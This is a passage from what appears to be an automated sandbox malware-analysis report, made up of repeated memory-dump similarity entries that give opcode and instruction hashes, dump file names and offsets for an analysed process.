                                      • Opcode Fuzzy Hash: a26047f44b037d6b5fae9729e081fde3b0ae504e89efa843c8f9b432a9d1b377
                                      • Instruction Fuzzy Hash: 07415375B001098FCB16DB74C554BADBBF2AF88304F288569D419AB352CB759D42CF91
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cc87d6f5f79fbe0e0f3e15a7ae36fc16eab3f465fdf657b72056609d567acc3a
                                      • Instruction ID: adeeabfcccf669be0d25fb61717dac9d167088de6cb3f46feda59743af944e55
                                      • Opcode Fuzzy Hash: cc87d6f5f79fbe0e0f3e15a7ae36fc16eab3f465fdf657b72056609d567acc3a
                                      • Instruction Fuzzy Hash: 51216070B00115CFDB0AEB78C459BBE36A3AB89754F104568D106EB3A6CF348E02DBD6
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86df338a6d18a417becaa40daa0f88d8b49dfa4585b8f76cfa8950587a023dfb
                                      • Instruction ID: 909924e65f88897e322ff0b9c6ad2497cc3f57b2667a8f19f9803c3d5c5db157
                                      • Opcode Fuzzy Hash: 86df338a6d18a417becaa40daa0f88d8b49dfa4585b8f76cfa8950587a023dfb
                                      • Instruction Fuzzy Hash: DA116070B00115CFCB0AEB78C458A7E36A3AB89754F104568D102EB3A6CF348E029BD5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a89634b38b007b5b4b7b77b678a31bd8243e498d006aee64eecb4ec484818a52
                                      • Instruction ID: 6e1ea5457be32f837de830b81993316a61d035a5859fbeddd2d22a62cf7106f6
                                      • Opcode Fuzzy Hash: a89634b38b007b5b4b7b77b678a31bd8243e498d006aee64eecb4ec484818a52
                                      • Instruction Fuzzy Hash: 37116370700115CFDB06EB78C458A7E36A36FC9754F144568D506EB3A6CF348E029BD5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10b45d5f4c1b023a3295972eb8ece37939fc5c41d45240bd2b8d8bd49f9a3881
                                      • Instruction ID: f7167419b4fc5b99ed975c06b4891c3f8810c02e02829961b0b0e59bcdf78dc6
                                      • Opcode Fuzzy Hash: 10b45d5f4c1b023a3295972eb8ece37939fc5c41d45240bd2b8d8bd49f9a3881
                                      • Instruction Fuzzy Hash: 53017130B001188BDB46EB78C859BAE76B2AB89304F504568D502B7396CF745901DBD1
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5eb0bbb3fc8bf0903db7d6122e96fbc38c46d4441e399c802c4b401eabdf38f3
                                      • Instruction ID: a770a19a60d0be6626549f8bcb5aa29c1e35d6aabf8ec55cecc53f04bd728056
                                      • Opcode Fuzzy Hash: 5eb0bbb3fc8bf0903db7d6122e96fbc38c46d4441e399c802c4b401eabdf38f3
                                      • Instruction Fuzzy Hash: 03018F30B002189BDB46EB78C859BEE76A2AB89300F604528D142BB396CF745D01DBD1
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a86ee09e75a1ed4537b43a346eeefd175b2f56ef7e663e1c98df3720c99398a8
                                      • Instruction ID: e2a979e642ce81c500328eca9792a5207319e6f94a1d5ef8d998597c48112b75
                                      • Opcode Fuzzy Hash: a86ee09e75a1ed4537b43a346eeefd175b2f56ef7e663e1c98df3720c99398a8
                                      • Instruction Fuzzy Hash: 1DF0AF70B10119CBCB06EF78C4597BE76A2BB88304F240928C102BB392CF748901DBD1
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4477572378.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_2730000_jsc.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 28e36affede80f9b1088510031eb052f624324af6be336c41a41f96b9f0b2a9e
                                      • Instruction ID: 3a34b0cc662e6d96d2abf10005c92d553a1c6e630eac4ad55c36d77bbb4b2418
                                      • Opcode Fuzzy Hash: 28e36affede80f9b1088510031eb052f624324af6be336c41a41f96b9f0b2a9e
                                      • Instruction Fuzzy Hash: 54E022737005121B870AA36DD40546FB6D7EBC2260314493EE80E8B340EF609D0643C2